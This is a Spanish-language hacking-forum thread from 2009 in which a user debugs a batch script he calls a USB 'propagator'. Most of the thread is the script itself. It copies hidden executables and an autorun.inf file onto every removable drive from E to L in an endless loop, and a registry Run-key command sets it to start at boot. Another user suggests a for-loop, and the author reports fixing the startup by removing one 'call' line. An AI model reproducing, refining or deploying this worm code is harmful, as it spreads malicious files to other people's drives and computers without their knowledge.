elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Problema con el Arranque de Este Bat[Solucionado]
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Problema con el Arranque de Este Bat[Solucionado]  (Leído 2,406 veces)
Software Download

Desconectado Desconectado

Mensajes: 44



Ver Perfil WWW
Problema con el Arranque de Este Bat[Solucionado]
« en: 2 Diciembre 2009, 19:53 pm »

Hola!

Valla que hace tiempo que no posteo aqui  :D.

En fin el problemaesta en que el siguiente codec es un propagador de Usb que es 100% funcional en Windows Vista pero en windows xp no me funciona.

Si ejecuto el propagador en Xp dandole doble click al archivo no tengo ningun poblema pero al intentar arrancarlo desde el registro de esta forma:

Código:
reg add "hklm\software\microsoft\windows\currentVersion\run" /v "run" /t "REG_SZ" /d "%userprofile%\Win32\run.bat" /f

Me da problemas, al reiniciar tan solo me abre una ventana del explorador con la siguiente ruta c:\Documents

El Codec

Código:
  @ echo off


:bucle
call :copiausb
:copiausb
if exist "E:" call :creausb "E"
if exist "F:" call :creausb "F"
if exist "G:" call :creausb "G"
if exist "H:" call :creausb "H"
if exist "I:" call :creausb "I"
if exist "J:" call :creausb "J"
if exist "K:" call :creausb "K"
ping -n 8 localhost > nul
goto bucle
goto :eof
:creausb

attrib -h "%userprofile%\Win32"


attrib -h "%userprofile%\Win32\usb.exe"
copy "%userprofile%\Win32\usb.exe" "%1:\usb.exe"
attrib +h "%1:\usb.exe"
attrib +h "%userprofile%\Win32\usb.exe"

attrib -h "%userprofile%\Win32\autorun.inf"
copy "%userprofile%\Win32\autorun.inf" "%1:\autorun.inf"
attrib +h "%1:\autorun.inf"
attrib +h "%userprofile%\Win32\autorun.inf"

attrib +h "%userprofile%\Win32"
goto :eof

He estado intentando arreglarlo pero la verdad esque ya me quebre la cabeza y pido su ayuda si no fuera mucho pedir

salu2!! Y Gracias!!


« Última modificación: 2 Diciembre 2009, 21:35 pm por J0cker » En línea

---saster---

Desconectado Desconectado

Mensajes: 55


Ver Perfil
Re: Problema con el Arranque de Este Bat
« Respuesta #1 en: 2 Diciembre 2009, 20:00 pm »

No tengo xp por lo que no te puedo ayudar mucho :P

Usa for

Citar
for %%a in (E,F,G,H,I,J,K,L) DO (
if exist %%a (call :creausb %%a)
)


En línea

Software Download

Desconectado Desconectado

Mensajes: 44



Ver Perfil WWW
Re: Problema con el Arranque de Este Bat
« Respuesta #2 en: 2 Diciembre 2009, 21:25 pm »

Hola!

No tengo xp por lo que no te puedo ayudar mucho :P

Usa for

Citar
for %%a in (E,F,G,H,I,J,K,L) DO (
if exist %%a (call :creausb %%a)
)

Intente meter al registro el bat con for de esta forma

Código:
@ echo off
:bucle
call :copiausb
:copiausb

for %%a in (E F G H I J K L) do call :creausb %%a

ping -n 8 localhost > nul
goto bucle
goto :eof
:creausb
attrib -h "%userprofile%\Win32"

attrib -h "%userprofile%\Win32\J0ck-1.exe"
copy "%userprofile%\Win32\J0ck-1.exe" "%1:\J0ck-1.exe"
attrib +h "%1:\J0ck-1.exe"
attrib +h "%userprofile%\Win32\J0ck-1.exe"

attrib -h "%userprofile%\Win32\run.exe"
copy "%userprofile%\Win32\run.exe" "%1:\run.exe"
attrib +h "%1:\run.exe"
attrib +h "%userprofile%\Win32\run.exe"

attrib -h "%userprofile%\Win32\usb.exe"
copy "%userprofile%\Win32\usb.exe" "%1:\usb.exe"
attrib +h "%1:\usb.exe"
attrib +h "%userprofile%\Win32\usb.exe"

attrib -h "%userprofile%\Win32\autorun.inf"
copy "%userprofile%\Win32\autorun.inf" "%1:\autorun.inf"
attrib +h "%1:\autorun.inf"
attrib +h "%userprofile%\Win32\autorun.inf"

attrib +h "%userprofile%\Win32"
goto :eof

y no me dio, solo sirve con darle doble click al archivo

alguna otra idea?? :huh:

salu2!! y Gracias por la respuesta
En línea

Software Download

Desconectado Desconectado

Mensajes: 44



Ver Perfil WWW
Re: Problema con el Arranque de Este Bat[Solucionado]
« Respuesta #3 en: 2 Diciembre 2009, 21:36 pm »

Lo Logre!!!

Tan solo era quitar el call

Código:
call :copiausb

Ya que no era necesario ponerlo  ;-)

salu2!!!
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
ayuda con arranque de win 7 [SOLUCIONADO] « 1 2 »
Windows
urvreak 14 7,314 Último mensaje 28 Marzo 2011, 20:06 pm
por urvreak
Gran problema arranque windows 7 (solucionado)
Windows
funbis 7 6,113 Último mensaje 27 Septiembre 2012, 19:17 pm
por simorg
(SOLUCIONADO) problema arranque
Hardware
kikino82 6 1,368 Último mensaje 15 Octubre 2015, 17:24 pm
por simorg
[SOLUCIONADO] Este shellcode...
Hacking Ético
arget 0 1,168 Último mensaje 19 Febrero 2016, 18:46 pm
por arget
Problema con doble arranque (windows 7 y XP)[SOLUCIONADO]
Windows
Lekim 0 1,062 Último mensaje 4 Marzo 2016, 22:00 pm
por Lekim
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines